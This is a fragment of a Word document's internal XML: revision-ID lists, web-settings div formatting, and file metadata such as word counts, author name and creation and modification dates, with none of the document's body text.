    <w:rsid w:val="0B2164B4"/>
    <w:rsid w:val="0C21EB9D"/>
    <w:rsid w:val="0C6EEFDA"/>
    <w:rsid w:val="0CA5BCF5"/>
    <w:rsid w:val="0CF16B02"/>
    <w:rsid w:val="0D0EA83C"/>
    <w:rsid w:val="0D7331C8"/>
    <w:rsid w:val="0DA493A1"/>
    <w:rsid w:val="0E34B165"/>
    <w:rsid w:val="0E38515B"/>
    <w:rsid w:val="0E7ED520"/>
    <w:rsid w:val="0EEF0AFF"/>
    <w:rsid w:val="0F2710E9"/>
    <w:rsid w:val="0F3BC626"/>
    <w:rsid w:val="0FA1833E"/>
    <w:rsid w:val="0FC2B762"/>
    <w:rsid w:val="0FD421BC"/>
    <w:rsid w:val="10829BA9"/>
    <w:rsid w:val="1133B5DC"/>
    <w:rsid w:val="125D97DE"/>
    <w:rsid w:val="127EA328"/>
    <w:rsid w:val="12C9BD22"/>
    <w:rsid w:val="12FFAB4C"/>
    <w:rsid w:val="1323B52D"/>
    <w:rsid w:val="13D7FAAC"/>
    <w:rsid w:val="147F508D"/>
    <w:rsid w:val="1526654B"/>
    <w:rsid w:val="15708739"/>
    <w:rsid w:val="15A9A1C9"/>
    <w:rsid w:val="16311B16"/>
    <w:rsid w:val="166642F0"/>
    <w:rsid w:val="1756AA52"/>
    <w:rsid w:val="177B15B4"/>
    <w:rsid w:val="17DBA544"/>
    <w:rsid w:val="17FB70DB"/>
    <w:rsid w:val="1806ED3F"/>
    <w:rsid w:val="19A64C8E"/>
    <w:rsid w:val="1A00AA47"/>
    <w:rsid w:val="1A920AC6"/>
    <w:rsid w:val="1B48F967"/>
    <w:rsid w:val="1B503978"/>
    <w:rsid w:val="1C06A5DF"/>
    <w:rsid w:val="1C3199CA"/>
    <w:rsid w:val="1C405B71"/>
    <w:rsid w:val="1C4E19FB"/>
    <w:rsid w:val="1D49775B"/>
    <w:rsid w:val="1D6EF0D3"/>
    <w:rsid w:val="1D753F2F"/>
    <w:rsid w:val="1DB441CE"/>
    <w:rsid w:val="1DC0B3BF"/>
    <w:rsid w:val="1E1D0B30"/>
    <w:rsid w:val="1E809806"/>
    <w:rsid w:val="1E8EAA91"/>
    <w:rsid w:val="1EBDBCF7"/>
    <w:rsid w:val="1EE51B29"/>
    <w:rsid w:val="1F4C538C"/>
    <w:rsid w:val="1F657BE9"/>
    <w:rsid w:val="1FA220AB"/>
    <w:rsid w:val="1FF18184"/>
    <w:rsid w:val="20E4C9BD"/>
    <w:rsid w:val="210381F1"/>
    <w:rsid w:val="2193FB94"/>
    <w:rsid w:val="21C64B53"/>
    <w:rsid w:val="21DF14CC"/>
    <w:rsid w:val="2230F8CD"/>
    <w:rsid w:val="229069C8"/>
    <w:rsid w:val="22F07C53"/>
    <w:rsid w:val="2315BA7F"/>
    <w:rsid w:val="237D6A90"/>
    <w:rsid w:val="2397F249"/>
    <w:rsid w:val="241621B9"/>
    <w:rsid w:val="2418BE18"/>
    <w:rsid w:val="242A90AA"/>
    <w:rsid w:val="249A98F2"/>
    <w:rsid w:val="2522B453"/>
    <w:rsid w:val="2536E43F"/>
    <w:rsid w:val="262BB881"/>
    <w:rsid w:val="26607DFC"/>
    <w:rsid w:val="26C2C881"/>
    <w:rsid w:val="26D2B4A0"/>
    <w:rsid w:val="26D56719"/>
    <w:rsid w:val="272FAE16"/>
    <w:rsid w:val="27879257"/>
    <w:rsid w:val="279B9387"/>
    <w:rsid w:val="279DAA41"/>
    <w:rsid w:val="28DEF8BA"/>
    <w:rsid w:val="29055798"/>
    <w:rsid w:val="290661FA"/>
    <w:rsid w:val="296396AC"/>
    <w:rsid w:val="298493FA"/>
    <w:rsid w:val="299D71E6"/>
    <w:rsid w:val="29F12D05"/>
    <w:rsid w:val="2A8C7CA2"/>
    <w:rsid w:val="2AD61FDE"/>
    <w:rsid w:val="2B2E317B"/>
    <w:rsid w:val="2B712F68"/>
    <w:rsid w:val="2BCECD27"/>
    <w:rsid w:val="2BEFC566"/>
    <w:rsid w:val="2D489C49"/>
    <w:rsid w:val="2D973396"/>
    <w:rsid w:val="2E032392"/>
    <w:rsid w:val="2E7D9298"/>
    <w:rsid w:val="2EADA4C6"/>
    <w:rsid w:val="2EDCF737"/>
    <w:rsid w:val="2EE6C55A"/>
    <w:rsid w:val="3002FF75"/>
    <w:rsid w:val="30482D5E"/>
    <w:rsid w:val="318AFEDA"/>
    <w:rsid w:val="31A73C14"/>
    <w:rsid w:val="320934C9"/>
    <w:rsid w:val="322B0D6C"/>
    <w:rsid w:val="3295923D"/>
    <w:rsid w:val="329AFF07"/>
    <w:rsid w:val="32A33B4C"/>
    <w:rsid w:val="32C5A2EC"/>
    <w:rsid w:val="32CFD32C"/>
    <w:rsid w:val="32E61C19"/>
    <w:rsid w:val="32F93E1B"/>
    <w:rsid w:val="32FF4476"/>
    <w:rsid w:val="3312C087"/>
    <w:rsid w:val="33300B36"/>
    <w:rsid w:val="3375E85C"/>
    <w:rsid w:val="33815CAB"/>
    <w:rsid w:val="33912CB7"/>
    <w:rsid w:val="33F5D222"/>
    <w:rsid w:val="345C57B5"/>
    <w:rsid w:val="34A9773F"/>
    <w:rsid w:val="34C0CA23"/>
    <w:rsid w:val="34CBDB97"/>
    <w:rsid w:val="355322C3"/>
    <w:rsid w:val="3562AE2E"/>
    <w:rsid w:val="35DD6503"/>
    <w:rsid w:val="363BDDA9"/>
    <w:rsid w:val="3656FD42"/>
    <w:rsid w:val="36572F30"/>
    <w:rsid w:val="37A3444F"/>
    <w:rsid w:val="384D4AF6"/>
    <w:rsid w:val="385701C3"/>
    <w:rsid w:val="38758B23"/>
    <w:rsid w:val="38C00A6D"/>
    <w:rsid w:val="38FBDD68"/>
    <w:rsid w:val="39E7F30F"/>
    <w:rsid w:val="3A18D4A2"/>
    <w:rsid w:val="3A58AB2A"/>
    <w:rsid w:val="3A7DEF1C"/>
    <w:rsid w:val="3A84FAF3"/>
    <w:rsid w:val="3AFB13C2"/>
    <w:rsid w:val="3B29E244"/>
    <w:rsid w:val="3B396CDE"/>
    <w:rsid w:val="3B47A8BD"/>
    <w:rsid w:val="3B54D1C0"/>
    <w:rsid w:val="3BC8D0CE"/>
    <w:rsid w:val="3C0878E6"/>
    <w:rsid w:val="3D0847B0"/>
    <w:rsid w:val="3D20D7BB"/>
    <w:rsid w:val="3D27FC4A"/>
    <w:rsid w:val="3D44E393"/>
    <w:rsid w:val="3D46DF17"/>
    <w:rsid w:val="3D89A4D4"/>
    <w:rsid w:val="3D90E361"/>
    <w:rsid w:val="3D92E35B"/>
    <w:rsid w:val="3DE876E8"/>
    <w:rsid w:val="3E5C96F0"/>
    <w:rsid w:val="3EA62A7E"/>
    <w:rsid w:val="3F6B1EEC"/>
    <w:rsid w:val="3FA41E75"/>
    <w:rsid w:val="4051ED2E"/>
    <w:rsid w:val="4054CA48"/>
    <w:rsid w:val="412CC434"/>
    <w:rsid w:val="41AC2507"/>
    <w:rsid w:val="41DE93E0"/>
    <w:rsid w:val="4306BD62"/>
    <w:rsid w:val="43E662E3"/>
    <w:rsid w:val="4580BF7E"/>
    <w:rsid w:val="460265C4"/>
    <w:rsid w:val="46A84921"/>
    <w:rsid w:val="46B7E0CA"/>
    <w:rsid w:val="470F45C7"/>
    <w:rsid w:val="47194831"/>
    <w:rsid w:val="47D3212D"/>
    <w:rsid w:val="47D7E68D"/>
    <w:rsid w:val="47F3BBB3"/>
    <w:rsid w:val="483CE05D"/>
    <w:rsid w:val="4847FB3D"/>
    <w:rsid w:val="499E0E8F"/>
    <w:rsid w:val="49B36DAE"/>
    <w:rsid w:val="49E28431"/>
    <w:rsid w:val="49F975D4"/>
    <w:rsid w:val="4A166C0A"/>
    <w:rsid w:val="4A5EF5DE"/>
    <w:rsid w:val="4A9EC1CE"/>
    <w:rsid w:val="4B39DEF0"/>
    <w:rsid w:val="4B5DD722"/>
    <w:rsid w:val="4C3FC3EC"/>
    <w:rsid w:val="4D1A24F3"/>
    <w:rsid w:val="4D38C6CB"/>
    <w:rsid w:val="4DAC2201"/>
    <w:rsid w:val="4DD66290"/>
    <w:rsid w:val="4E6C22B8"/>
    <w:rsid w:val="4E8C7FAD"/>
    <w:rsid w:val="4E93E44D"/>
    <w:rsid w:val="4EAB91CF"/>
    <w:rsid w:val="4EDFAAE5"/>
    <w:rsid w:val="4EEDDDA5"/>
    <w:rsid w:val="4F827AE4"/>
    <w:rsid w:val="4FDD0425"/>
    <w:rsid w:val="4FE2B071"/>
    <w:rsid w:val="4FE3131D"/>
    <w:rsid w:val="50C37225"/>
    <w:rsid w:val="51A4713F"/>
    <w:rsid w:val="521E8089"/>
    <w:rsid w:val="521ED38B"/>
    <w:rsid w:val="53937E0E"/>
    <w:rsid w:val="5433AB64"/>
    <w:rsid w:val="5438B3C8"/>
    <w:rsid w:val="5451DC25"/>
    <w:rsid w:val="552F4E6F"/>
    <w:rsid w:val="5596F840"/>
    <w:rsid w:val="55A3353C"/>
    <w:rsid w:val="55B1AC10"/>
    <w:rsid w:val="58083777"/>
    <w:rsid w:val="58D63082"/>
    <w:rsid w:val="592CA8EF"/>
    <w:rsid w:val="595A216D"/>
    <w:rsid w:val="59AA6F9A"/>
    <w:rsid w:val="59F0F404"/>
    <w:rsid w:val="5A0C84D9"/>
    <w:rsid w:val="5ACA47ED"/>
    <w:rsid w:val="5B1FB6CC"/>
    <w:rsid w:val="5BA8891F"/>
    <w:rsid w:val="5BB3F9AD"/>
    <w:rsid w:val="5C131FB0"/>
    <w:rsid w:val="5C63F4A1"/>
    <w:rsid w:val="5CD44321"/>
    <w:rsid w:val="5D34C90A"/>
    <w:rsid w:val="5D34F0AC"/>
    <w:rsid w:val="5D5004AD"/>
    <w:rsid w:val="5D6B8221"/>
    <w:rsid w:val="5DAEF011"/>
    <w:rsid w:val="5DCC94CF"/>
    <w:rsid w:val="5E15F84A"/>
    <w:rsid w:val="5E87F3BA"/>
    <w:rsid w:val="5ED630B5"/>
    <w:rsid w:val="5F1BCE8D"/>
    <w:rsid w:val="600EFEA1"/>
    <w:rsid w:val="6082C005"/>
    <w:rsid w:val="60B9F735"/>
    <w:rsid w:val="60FAF996"/>
    <w:rsid w:val="61043591"/>
    <w:rsid w:val="611736D0"/>
    <w:rsid w:val="621120E1"/>
    <w:rsid w:val="626E2BEF"/>
    <w:rsid w:val="62AEE3E4"/>
    <w:rsid w:val="62C90DF9"/>
    <w:rsid w:val="634DB73D"/>
    <w:rsid w:val="636C649C"/>
    <w:rsid w:val="637DDA81"/>
    <w:rsid w:val="63A6CA24"/>
    <w:rsid w:val="643BD653"/>
    <w:rsid w:val="64A8841A"/>
    <w:rsid w:val="64D2A8EA"/>
    <w:rsid w:val="6541B396"/>
    <w:rsid w:val="654D5FBF"/>
    <w:rsid w:val="65544B30"/>
    <w:rsid w:val="6566E15B"/>
    <w:rsid w:val="65A6E688"/>
    <w:rsid w:val="65E876EA"/>
    <w:rsid w:val="65F3E431"/>
    <w:rsid w:val="65FFC39F"/>
    <w:rsid w:val="6627699E"/>
    <w:rsid w:val="66498935"/>
    <w:rsid w:val="66525D89"/>
    <w:rsid w:val="668245C9"/>
    <w:rsid w:val="6682A9BD"/>
    <w:rsid w:val="66A1FE8E"/>
    <w:rsid w:val="66D04202"/>
    <w:rsid w:val="66EFA5BD"/>
    <w:rsid w:val="671FF251"/>
    <w:rsid w:val="6727BDF7"/>
    <w:rsid w:val="67A42473"/>
    <w:rsid w:val="67C17D7A"/>
    <w:rsid w:val="67C727AB"/>
    <w:rsid w:val="68099BAA"/>
    <w:rsid w:val="680A49AC"/>
    <w:rsid w:val="6825E55C"/>
    <w:rsid w:val="6A8DCD28"/>
    <w:rsid w:val="6B48B77C"/>
    <w:rsid w:val="6B56E3EB"/>
    <w:rsid w:val="6C5E6058"/>
    <w:rsid w:val="6C984542"/>
    <w:rsid w:val="6CDDEFC2"/>
    <w:rsid w:val="6D701105"/>
    <w:rsid w:val="6EDB19A8"/>
    <w:rsid w:val="6EF15F48"/>
    <w:rsid w:val="6F1529FA"/>
    <w:rsid w:val="6FD50E41"/>
    <w:rsid w:val="70009F7D"/>
    <w:rsid w:val="702020CE"/>
    <w:rsid w:val="70854D2C"/>
    <w:rsid w:val="70C2130A"/>
    <w:rsid w:val="70E3E64F"/>
    <w:rsid w:val="718A4AF6"/>
    <w:rsid w:val="71B84101"/>
    <w:rsid w:val="727FB6B0"/>
    <w:rsid w:val="72F0015F"/>
    <w:rsid w:val="7309AF26"/>
    <w:rsid w:val="7331ED8F"/>
    <w:rsid w:val="73628D8B"/>
    <w:rsid w:val="73B5E79A"/>
    <w:rsid w:val="742512C6"/>
    <w:rsid w:val="743C74BB"/>
    <w:rsid w:val="74478874"/>
    <w:rsid w:val="74A1BD07"/>
    <w:rsid w:val="753F95F2"/>
    <w:rsid w:val="7545BD10"/>
    <w:rsid w:val="75E30584"/>
    <w:rsid w:val="762C0E6A"/>
    <w:rsid w:val="76BE02F0"/>
    <w:rsid w:val="76E18D71"/>
    <w:rsid w:val="76F48EB0"/>
    <w:rsid w:val="775BB15B"/>
    <w:rsid w:val="779EA276"/>
    <w:rsid w:val="77DBC641"/>
    <w:rsid w:val="7804DFAD"/>
    <w:rsid w:val="7805C45A"/>
    <w:rsid w:val="7842F94F"/>
    <w:rsid w:val="78EBE43F"/>
    <w:rsid w:val="78F68BAB"/>
    <w:rsid w:val="798B289B"/>
    <w:rsid w:val="79F9B6F1"/>
    <w:rsid w:val="7B4CFCC4"/>
    <w:rsid w:val="7B564888"/>
    <w:rsid w:val="7B72160E"/>
    <w:rsid w:val="7BAEF4C3"/>
    <w:rsid w:val="7BB7CC39"/>
    <w:rsid w:val="7BC361F7"/>
    <w:rsid w:val="7C45AA0D"/>
    <w:rsid w:val="7CAA4D62"/>
    <w:rsid w:val="7CACCEEC"/>
    <w:rsid w:val="7E1EC23B"/>
    <w:rsid w:val="7E2355C2"/>
    <w:rsid w:val="7E625861"/>
    <w:rsid w:val="7ED3F30A"/>
    <w:rsid w:val="7F66273E"/>
    <w:rsid w:val="7FFE28C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180C1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CE6B2C72-30DB-43CC-AD58-16E4A5103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02B5B"/>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C02B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981567">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1888713517">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="664867417">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="258368670">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="3056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683636">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1639922164">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1575627454">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1545367262">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="8590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microsoft.com/office/2020/10/relationships/intelligence" Target="intelligence2.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1420</Words>
  <Characters>8100</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>67</Lines>
  <Paragraphs>19</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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Agballog</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Francisco Agballog</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-12-13T22:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-19T09:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>